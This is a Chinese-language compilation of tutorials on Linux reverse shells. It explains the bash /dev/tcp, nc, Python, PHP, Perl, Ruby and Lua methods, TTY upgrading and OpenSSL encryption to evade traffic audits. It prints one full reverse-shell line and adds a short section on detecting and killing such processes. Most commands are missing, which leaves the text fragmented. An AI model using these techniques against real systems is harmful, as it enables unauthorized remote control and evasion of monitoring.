linux反dshell知识汇总

shell是渗透中常用的名词，像getshell，webshell，反dshell等等，都和shell相关。

百度百科解释的shell：

在计算机科学中，Shell俗称壳（用来区别于核），是指“为使用者提供 *** 作界面”的软件（命令解析器）。它类似于DOS下的command.com和后来的cmd.exe。它接收用户命令，然后调用相应的应用程序。

简单说用户通过壳访问 *** 作系统内核的服务，也就是由壳到内核，执行系统命令。

getshell：获取到目标的命令执行权限

webshell：指网站后门，通过web服务进行命令执行

反dshell：把命令行的输入输出转移到其它主机

1、webshell下执行命令不交互，为了方便提权或其它 *** 作必须要反dshell。

2、反dshell相当于新增一个后门，当webshell被发现删除后权限不会丢失。

使用whereis命令去确定目标支持的反d方法。

bash反d是实战中用的最多的方法

把命令拆开分析：

1、bash -i代表在本地打开一个bash

2、/dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用，建立一个socket连接

3、>&后面跟上/dev/tcp/ip/port这个文件代表将标准输出和标准错误输出重定向到这个文件，也就是传递到远程vps

4、远程vps开启对应的端口去监听，就会接收到这个bash的标准输出和标准错误输出。

需要目标主机安装了nc

使用其他版本的 nc

配合命名管道进行反d：

首先使用socket与远程建立起连接，接下来使用到了os库的dup2方法将标准输入、标准输出、标准错误输出重定向到远程，dup2这个方法有两个参数，分别为文件描述符fd1和fd2，当fd2参数存在时，就关闭fd2，然后将fd1代表的那个文件强行复制给fd2，在这里可以把fd1和fd2看作是C语言里的指针，将fd1赋值给fd2，就相当于将fd2指向于s.fileno()，fileno()返回的是一个文件描述符，在这里也就是建立socket连接返回的文件描述符，打印出来数值为3

0代表标准输入、1代表标准输出、2代表标准错误输出、3代表重定向到远程

接下来使用os的subprocess在本地开启一个子进程，传入参数“-i”使bash以交互模式启动，标准输入、标准输出、标准错误输出又被重定向到了远程，这样的话就可以在远程执行输入命令了。

需要php关闭safe_mode选项，才可以使用exec函数。

使用php的exec函数执行方法1反dshell的命令

使用php的fsockopen去反dshell

exec反d

perl反d

ruby反d

lua反d

通过上述命令反dshell得到的shell并不能称为完全交互的shell，通常称之为'哑'shell。

通常存在以下缺点

因此有必要去获取一个完全交互的shell。

1、在哑 shell 中执行python,使用pty模块，创建一个原生的终端，命令如下：

运行完后

2、键入 Ctrl-Z暂停任务，切回到 VPS 的命令行中；在 VPS 中执行：

3、在哑 shell 中执行，得到一个完全交互的shell，支持命令补全、历史命令查看、语法高亮、vim编辑等功能。

部分防护设备会对内外网传输流量进行审查，反dshell执行命令都是以明文进行传输的，很容易被查杀。

因此需要将原始流量使用 openssl 加密，绕过流量审计设备。

1、首先vps上生成SSL证书的公钥/私钥对,信息懒得填，一直回车即可。

2、vps使用 OpenSSL 监听一个端口

3、目标主机执行反d加密shell

反d成功，成功接收到ssl流量加密的shell。

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

https://www.sohu.com/a/161766202_709042

https://www.freebuf.com/vuls/211847.html

https://www.freebuf.com/articles/system/178150.html

https://zhuanlan.zhihu.com/p/138393396

https://www.cnblogs.com/Dubing-ydfc/p/11749241.html

反dshell定义：自行百度~

明确反dshell写法： bash -i >&/dev/tcp/10.0.0.1/8080 0>&1

1、登录服务器查看命令：ps -ef，过滤出反dshell的进程

2、定位进程启动路径，命令：pwdx pid

3、进入启动路径，确认启动的服务是否正常，命令：cd *

4、定位可疑文件，并删除。命令：rm

5、停止进程shell进程，命令：kill -9 pid

上图：

简单来说，Shell就是实现用户命令的接口，通过这个接口我们就能实现对计算机的控制，比如我们常见的ssh就是执行的Shell命令实现对远程对服务器的控制。

那反dShell是啥呢?其英文名叫做Reverse

Shell，具体干什么的呢?就是控制端首先监听某个TCP/UDP端口，然后被控制端向这个端口发起一个请求，同时将自己命令行的输入输出转移到控制端，从而控制端就可以输入命令来控制被控端了。

比如说，我们有两台主机A、B，我们最终想实现在A上控制B。那么如果用正向Shell，其实就是在A上输入B的连接地址，比如通过ssh连接到

B，连接成功之后，我们就可以在A上通过命令控制B了。

如果用反向Shell，那就是在A上先开启一个监听端口，然后让B去连接A的这个端口，连接成功之后，A这边就能通过命令控制B了。

反dshell有什么用?

还是原来的例子，我们想用A来控制B，如果想用ssh等命令来控制，那得输入B的sshd地址或者端口对吧?但是在很多情况下，由于防火墙、安全组、局域网、NAT等原因，我们实际上是无法直接连接到B的，比如：

A虽然有公网IP，但B是一个处于内网的机器，A就没法直接连到B上。

B上开了防火墙或者安全组限制，sshd的服务端口22被封闭了。

B是一台拨号主机，其IP地址经常变动。

假如B被攻击了，我们想让B向A汇报自己的状况，那自然就需要B主动去连接A。

如果是这些情况，我们就可以用反dShell用A来控制B了。

---